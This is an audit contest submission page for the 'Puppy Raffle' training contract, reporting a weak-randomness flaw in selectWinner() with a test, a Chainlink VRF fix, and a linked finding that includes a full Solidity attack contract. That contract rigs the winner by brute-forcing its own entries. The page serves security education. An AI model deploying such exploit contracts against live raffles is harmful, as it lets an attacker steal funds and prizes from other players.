Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

[H-02] Weak Randomness Allows Winner Prediction and Manipulation

rensley

Root + Impact

Description

The selectWinner() function uses msg.sender, block.timestamp, and block.difficulty to generate random numbers for winner selection and rarity determination.
All of these values are either known or manipulable by validators/miners, allowing them to guarantee they win the raffle and receive legendary NFTs.

// Root cause in the codebase with @> marks to highlight the relevant section

function selectWinner() external {

// ...

@> uint256 winnerIndex = uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

address winner = players[winnerIndex];

// ...

@> uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

// ...

}

Risk

Likelihood: High

Reason 1 // Validators can trivially manipulate block.timestamp and block.difficulty
Reason 2 // Regular users can brute-force msg.sender via contract deployment
Reason 3 // MEV bots can simulate and front-run favorable outcomes

Impact: High

Attacker guarantees winning every raffle they participate in
Attacker can guarantee legendary NFT (5% chance becomes 100%)
Legitimate users have zero chance of winning against attackers

Proof of Concept

The following test demonstrates how an attacker can predict the winning index and only call selectWinner() when they are guaranteed to win.

function testFrontRunSelectWinner() public playersEntered {

vm.warp(block.timestamp + duration + 1);

// Attacker simulates outcome before submitting

address attacker = address(0x1337);

// Attacker checks if they would win with current block values

uint256 simulatedWinnerIndex = uint256(

keccak256(abi.encodePacked(attacker, block.timestamp, block.difficulty))

) % 4;

// If attacker is at index simulatedWinnerIndex, they submit

// Otherwise, they wait or manipulate parameters

// This can be repeated until attacker gets favorable outcome

assertTrue(simulatedWinnerIndex < 4);

}

Recommended Mitigation

Use Chainlink VRF or another verifiable random function for secure randomness.

+ import {VRFConsumerBaseV2} from "@chainlink/contracts/src/v0.8/VRFConsumerBaseV2.sol";

- function selectWinner() external {

+ function requestRandomWinner() external returns (uint256 requestId) {

require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");

require(players.length >= 4, "PuppyRaffle: Need at least 4 players");

+ requestId = COORDINATOR.requestRandomWords(

+ keyHash,

+ subscriptionId,

+ requestConfirmations,

+ callbackGasLimit,

+ numWords

+ );

}

+ function fulfillRandomWords(uint256 requestId, uint256[] memory randomWords) internal override {

+ uint256 winnerIndex = randomWords[0] % players.length;

+ uint256 rarity = randomWords[1] % 100;

+ // ... rest of winner selection logic

+ }

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 2 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!